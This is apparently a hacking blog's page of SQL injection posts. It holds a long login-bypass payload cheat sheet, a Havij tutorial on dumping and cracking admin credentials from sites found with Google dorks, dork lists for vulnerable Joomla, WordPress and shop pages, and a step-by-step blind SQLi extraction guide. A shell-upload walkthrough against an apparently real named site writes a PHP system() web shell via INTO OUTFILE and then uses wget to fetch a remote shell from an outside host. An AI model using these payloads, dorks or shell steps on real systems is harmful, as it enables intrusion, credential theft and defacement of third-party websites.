Latest News

Showing posts with label Sqli. Show all posts
Showing posts with label Sqli. Show all posts

cheat sheet for admin page bypass [sql injection]

strings ::

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
= 'or' 1=1
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

SQL MAP [sql injection]



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Video TUt:

Hack Websites Using Havij [SQL Injection Tutorial]


According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Supported Databases With Havij

  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)
Things We Need:
  1. Havij Tool - (Search In Google And Download Cracked Version.)
  2.  SQLI Vulnerable Website. - Use Google Dorks To Search Vulnerable Website.
Start Tutorial.

  1. Open Havij.
  2. Type Vulnerable Website Inside It And Hit Analyze Button.

Havij Hacking Tutorial


  1. Now Click On Tables Tab And Then Hit Get DBs Button.

Havij Hacking Tutorial

  1. Now You Have Got All Databases In Result. Tick Databases And Hit Get Tables Button.

Havij Hacking Tutorial

  1. You Have Got Tables From The Databases You Ticked In Previous Step. Now Tick Related Tables And Hit Get Columns Button.

How To Hack Website


  1. You Have Got Columns From Ticked Table. Tick Related Columns And Press Get DataButton.
I Am Going To Choose Username, Password, UserGroup Columns. There Should Be Stored Data Related To Admin's Username, Password Etc.

Havij Hacking Tutorial


  1. Bingo! You Have Got Username And Password Of Admin.

Havij Hacking Tutorial


How To Crack Hash?


As You Can See, We Have Received All Information Of Admin. Like Username, Password And UserGroup. But We Have Received Password In The Shape Of Hash. In Order To See The Real Password. We Have To Crack This Code. For Cracking This Code. We Will Make Use Of Havij Tool Again. Follow Me To Crack This Hash.

  1. You Can See A Button Of MD5 In Buttons List Of Havij. Hit That Button And Paste Your Hash Code Inside It And Press Start Button.

Havij Hacking Tutorial


  1. You Can See Password In Plain Text In Result Now. See Picture Below.

Havij Hacking Tutorial

Find Admin Page


We Have Got Everything. Like Username, Password. But Where To Use Them And Get Admin Rights? You Need To Find The Admin Login Page Of Target Site. For Finding Admin Page Of Target Site. We Will Use Havij Again.
  1. In Buttons List, Press Find Admin Button. Type Homepage Url Of Target Site. Press Start Button.

Havij Hacking Tutorial

You Will Get Result Same Like Hash Cracking. You Will Be Able To See The Page. Which Admin Of Your Target Site Use To Login.

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r


Some Joomla Usefull Dorks


Joomla JCE Exploit Remote File Upload-

inurl:/index.php?option=com_jceinurl:/index.php?option=com_virtuemar

tinurl:/images/stories/3xp.phpinurl:/images/stories/0day.phpinurl:/images/stories/inurl:/images/stories/ php

-Wordpress Themes Vulnerable Shell Upload-

inurl:/wp-content/themes/wpstore

inurl:/wp-content/themes/eShopinurl:/wp-content/themes/KidzStore

inurl:/wp-content/themes/Emporium

inurl:/wp-content/themes/Store

inurl:/wp-content/themes/eCommerce

inurl:/wp-content/themes/framework

inurl:/wp-content/themes/framework/chkorder.php?color=

inurl:/wp-content/themes/wpstore/thumb.php?src=

inurl:/wp-content/themes/framework/thumb.php?src=

inurl:/wp-content/themes/eCommerce/thumb.php?src=

inurl:/wp-content/themes/framework/getsubcat.php?q=

-SQL Injection-

inurl:about.php?ID=
inurl:article.php?id=by modulobox.eu
inurl:"lang"inurl:show_news.php?news_id=
inurl:page_main.php?id_stdpg=

-SQL Injection Web Shop-

inurl:buy.php?id=
inurl:item.php?shopcd=
inurl:shop.php?id=
inurl:additem.php?id=
inurl:"shop-cart.php?id=
"inurl:"addtocart.php?id=

SQL injection - Blind Injection


This is more advanced then an ordinary one just keep on reading and you will understand why.

Some Google dorks for Sql injection:

Not all of these needs to be hacked with the Blind Sqli method.

inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=


I am using our target example as:


http://www.site.com/news.php?id=5


When we execute this, we see some page and articles on that page, pictures etc...


then when we want to test it for blind Sql injection attack


http://www.site.com/news.php?id=5 and 1=1


The page loads normally, that's okay.


Now the real test.



http://www.site.com/news.php?id=5 and 1=2


So if some text, picture or some content is missing on returned page then that site is vulnerable to blind Sql injection.


Step 1:Get the MySQL version:


To get the version in blind attack we use substring.



http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4



This should return TRUE if the version of MySQL is 4.


Replace 4 with 5, and if query return TRUE then the version is 5.



18 http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5


Step 2:Test if subselect works:


When select don't work then we use subselect


http://www.site.com/news.php?id=5 and (select 1)=1


If page loads normally then subselects work.


Then we going to see if we have access to mysql.user



http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1


If page loads normally we have access to mysql.user and then later we can pull some password using load_file() function and OUTFILE.


Step 3:Check table and column names:


This part might be tricky because you have to guess.


For example


http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1


(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)


Then if the page loads normally without content missing, the table users exits.If you get FALSE (some article missing), just change table name until you guess the right one.


Let's say that we have found that table name is users, now what we need is column name.


The same as table name, we start guessing. As same I said before try the common names for columns.



http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) fr om users limit 0,1)=1


If the page loads normally we know that column name is password (if we get false then try common names or just guess)


Here we merge 1 with the column password, then substring returns the first character (,1,1)


Step 4:Pull data from the database:


We found table users in columns username password so we are going to pull characters from that.



19 http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),1,1))>80


Ok this here pulls the first character from first user in table users.


Substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value


and then compare it with symbol greater then > .


So if the ascii character greater then 80, the page loads normally. (TRUE) We keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),1,1))>95


We get TRUE, keep on raising the value.



http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),1,1))>98


TRUE again, higher



http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),1,1))>99


Let’s say we got a false value now.


So the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.


then let's check the second character.



http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),2,1))>99


Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)




http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),2,1))>99


True keep going.



http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),2,1))>107


20 False lower number.



http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a ,password) from users limit 0,1),2,1))>104


True go higher.

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r

Shell Uploading Via SQL Injection


In this I will show you how to upload a shell via SQLi.

This method is useful when you have admin info and can't upload anything, or when you have admin info but you can't find admin login and so on.

But this method is very rare!

Anyways let's start with our tutorial...

Things we will need:

1)  Your shell source in .txt format (I will use  http://www.sh3ll.org)
2)  Basic SQLi skill

So let's say you injected our site like this:

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,3,4--

Now you have admin info, you logged in and you failed uploading a shell.
Now our method comes to point.
Remember what column you should use. (Mine one will be 3)

Type in your vuln. column "user" and at the end "from mysql.user" so URL would be like:

http://shop.moto25.ru/news.php? newsnomber=-999+union+select+1,2,user,4+from+mysql.user--

NOTE: If you get an error after this you can't use this method.gg

You should get what is the current user for the site.

moto25_moto25

Good. Now remember that you will need it.

Now we check users file privilege.


In your column type: "group_concat(user,0x3a,file_priv)"

http://shop.moto25.ru/news.php? newsnomber=-999+union+select+1,2,group_concat(user,0x3a,file_priv),4+from+mysql.us er--

Now you should get all users and their privileges

root:Y,root:Y,apache:N,moto25_moto25:Y

Now our user was "moto25_moto25"...
That means we can make files on server.
Let's go to the next step.

To create a file into a server you need to find sites full path.



To do that you must cause an error, hopefully that error would give us our sites path.

We got ours:

/var/www/vhost/moto25/data/www/moto25.ru/

After that we must find writeable folder in our server.
Just browse around or scan it with Acunetix.
Usually public_html folder is writeable.
For our example I used

http://shop.moto25.ru/equip/

So spawning our shell is easy as 1,2,3..
Let's get back at our injection.

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,3,4--

Our column should be our php line.
In there we type:

" system($_GET['cmd']); ?>"

NOTE: Quotation marks are required

All other columns should be "null"

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null--

And at the end we use "INTO OUTFILE" function.

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null INTO OUTFILE--

Now we use site's full path and writeable folder:

/var/www/vhost/moto25/data/www/moto25.ru/equip/

Now

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null INTO OUTFILE /var/www/vhost/moto25/data/www/moto25.ru/equip/--

And our file name and extension.

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/moto25/data/www/moto25.ru/equip/phpcmd.php"--

Now, our shell should be spawned.
We now check if our file is created.

http://shop.moto25.ru/equip/phpcmd.php






You should get something like:

Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/phpcmd.php on line 1

That means we have our file created! Yeh…….!
We check if it is working:

http://shop.moto25.ru/equip/phpcmd.php?cmd=ls -la

We can see all files in current directory!
And simple command to download a shell:

http://shop.moto25.ru/equip/phpcmd.php?cmd=wget www.sh3ll.org/egy.txt -O egy.php

Explanation:

wget - Downloads textual file on our server (egy.txt). -O - Renames it to egy.php

Game over!
I hope you learned something more interesting ..

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code